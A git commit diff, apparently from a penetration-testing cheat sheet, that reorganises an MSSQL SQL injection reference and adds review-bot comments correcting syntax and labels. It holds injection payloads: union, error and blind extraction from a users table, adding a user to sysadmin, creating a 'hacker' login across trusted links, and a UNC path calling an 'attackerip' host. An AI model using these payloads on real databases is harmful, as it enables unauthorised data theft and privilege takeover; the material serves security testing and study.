MSSQL, OracleSQL, PostgreSQL Substring Equivalent

This commit is contained in:
Swissky
2024-11-16 15:35:43 +01:00
parent 67af38aa4e
commit 9a908a15d2
4 changed files with 187 additions and 169 deletions


@@ -7,17 +7,15 @@
* [MSSQL Default Databases](#mssql-default-databases)
* [MSSQL Comments](#mssql-comments)
* [MSSQL User](#mssql-user)
* [MSSQL Version](#mssql-version)
* [MSSQL Hostname](#mssql-hostname)
* [MSSQL Database Name](#mssql-database-name)
* [MSSQL Database Credentials](#mssql-database-credentials)
* [MSSQL List Databases](#mssql-list-databases)
* [MSSQL List Columns](#mssql-list-columns)
* [MSSQL List Tables](#mssql-list-tables)
* [MSSQL Enumeration](#mssql-enumeration)
* [MSSQL List Databases](#mssql-list-databases)
* [MSSQL List Columns](#mssql-list-columns)
* [MSSQL List Tables](#mssql-list-tables)
* [MSSQL Union Based](#mssql-union-based)
* [MSSQL Error Based](#mssql-error-based)
* [MSSQL Blind Based](#mssql-blind-based)
* [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
* [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked Query](#mssql-stacked-query)
* [MSSQL Read File](#mssql-read-file)
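Review bot: the new entries `MSSQL List Databases`, `MSSQL List Columns` and `MSSQL List Tables` become `###` subsections of `MSSQL Enumeration` later in this commit, so they should be indented as a nested list under the `MSSQL Enumeration` entry rather than sitting at the same level; as displayed here they read as top-level siblings. The same applies to `MSSQL Blind With Substring Equivalent`, which is a `###` subsection of `MSSQL Blind Based` and belongs nested under it.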
@@ -27,9 +25,10 @@
* [MSSQL Out of Band](#mssql-out-of-band)
* [MSSQL DNS Exfiltration](#mssql-dns-exfiltration)
* [MSSQL UNC Path](#mssql-unc-path)
* [MSSQL Make User DBA](#mssql-make-user-dba)
* [MSSQL Trusted Links](#mssql-trusted-links)
* [MSSQL List Permissions](#mssql-list-permissions)
* [MSSQL Privileges](#mssql-privileges)
* [MSSQL List Permissions](#mssql-list-permissions)
* [MSSQL Make User DBA](#mssql-make-user-dba)
* [References](#references)
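Review bot: same indentation point for the `MSSQL Privileges` group: `MSSQL List Permissions` and `MSSQL Make User DBA` become `###` subsections, so nest them under the `MSSQL Privileges` entry so the TOC mirrors the heading levels.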
@@ -54,39 +53,6 @@
| `;%00` | Null byte |
## MSSQL User
```sql
SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;
```
## MSSQL Version
```sql
SELECT @@version
```
## MSSQL Hostname
```sql
SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');
```
## MSSQL Database Name
```sql
SELECT DB_NAME()
```
## MSSQL Database Credentials
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
@@ -102,58 +68,100 @@ SELECT DB_NAME()
```
## MSSQL List Databases
## MSSQL Enumeration
| Description | SQL Query |
| ------------- | ----------------------------------------- |
| DBMS version | `SELECT @@version` |
| Database name | `SELECT DB_NAME()` |
| Hostname | `SELECT HOST_NAME()` |
| Hostname | `SELECT @@hostname` |
| Hostname | `SELECT @@SERVERNAME` |
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
| Hostname | `SELECT SERVERPROPERTY('edition')` |
| User | `SELECT CURRENT_USER` |
| User | `SELECT user_name();` |
| User | `SELECT system_user;` |
| User | `SELECT user;` |
### MSSQL List Databases
```sql
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb (Only works in MSSQL 2017+)
-- for N = 0, 1, 2, …
SELECT DB_NAME(N);
-- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb
-- (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;
```
## MSSQL List Columns
### MSSQL List Columns
```sql
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
-- for the current DB only
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, column_name FROM information_schema.columns
```
## MSSQL List Tables
### MSSQL List Tables
```sql
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
-- use xtype = 'V' for views
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
```
## MSSQL Union Based
```sql
-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb
* Extract databases names
-- extract tables from Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users
```sql
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb
```
-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
* Extract tables from Injection database
-- Finally extract the data
$ SELECT UserId, UserName from Users
```
```sql
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users
```
* Extract columns for the table Users
```sql
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
```
* Finally extract the data
```sql
$ SELECT UserId, UserName from Users
```
## MSSQL Error Based
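Review bot: in the new `MSSQL Enumeration` table the `SERVERPROPERTY('productversion')`, `SERVERPROPERTY('productlevel')` and `SERVERPROPERTY('edition')` rows are labelled `Hostname`, but they return version and edition information; label them `DBMS version` / `Edition` so the table is not misleading. While touching it, `SELECT @@hostname` is a MySQL variable rather than a T-SQL one (SQL Server exposes `@@SERVERNAME`, already listed, and `HOST_NAME()` returns the client workstation name), so it is worth dropping, and the trailing semicolons (`SELECT user_name();` next to `SELECT CURRENT_USER`) should be made consistent. In `MSSQL List Tables`, the `master..syscolumns ... master..sysobjects.name='sometable'` query lists columns, not tables, and is already present in `MSSQL List Columns` directly above, so remove the duplicate; `SELECT table_catalog, table_name FROM information_schema.columns` returns one row per column, so `SELECT DISTINCT table_catalog, table_name FROM information_schema.tables` is the better form. Finally, the `MSSQL Union Based` blocks mix `$` prompts and `[*]` output lines inside `sql` fences; they are a session transcript rather than SQL, so either drop the prompt/output decoration or fence them as plain text.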
@@ -179,14 +187,26 @@ $ SELECT UserId, UserName from Users
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
```
```sql
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```
### MSSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
Examples:
```sql
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```
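Review bot: the first and third `Examples` lines are not valid T-SQL as written: in `AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97` the subquery needs its own parentheses, i.e. `AND ASCII(SUBSTRING((SELECT TOP 1 username FROM tblusers),1,1))=97`, and `AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'` needs the subquery wrapped and restricted to a single row (`TOP 1`), since a scalar comparison against a multi-row subquery raises an error. The `SELECT @@version WHERE @@version LIKE ...` and `WITH data AS (...)` examples moved into this block rely on `LIKE` rather than a substring function, so they belong in the general `MSSQL Blind Based` section, not under `Blind With Substring Equivalent`. The function table also lists only `SUBSTRING`; given the commit title, a short sentence pointing to the Oracle and PostgreSQL equivalents in their own files would make the subsection's purpose clear.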
@@ -312,12 +332,6 @@ RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
```
## MSSQL Make User DBA
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
## MSSQL Trusted Links
> The links between databases work even across forest trusts.
@@ -349,32 +363,43 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
## List Permissions
Listing effective permissions of current user on the server.
## MSSQL Privileges
### MSSQL List Permissions
* Listing effective permissions of current user on the server.
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
```
* Listing effective permissions of current user on the database.
```sql
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
```
* Listing effective permissions of current user on a view.
```sql
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
```
* Check if current user is a member of the specified server role.
```sql
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
```
### MSSQL Make User DBA
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
Listing effective permissions of current user on the database.
```sql
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
```
Listing effective permissions of current user on a view.
```
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
```
Check if current user is a member of the specified server role.
```sql
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
```
## MSSQL OPSEC
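Review bot: the moved `EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;` under `### MSSQL Make User DBA` carries an unterminated string literal (the same typo the removed `MSSQL Make User DBA` section had) and should read `EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';`. Since this commit is already restructuring the section, it would be worth noting that `sp_addsrvrolemember` is deprecated and `ALTER SERVER ROLE sysadmin ADD MEMBER [user];` is the current form. The rest of the hunk looks right: the view-permissions block gains the `sql` fence tag the old block lacked, and the bullet lead-ins match the list style used elsewhere in the file.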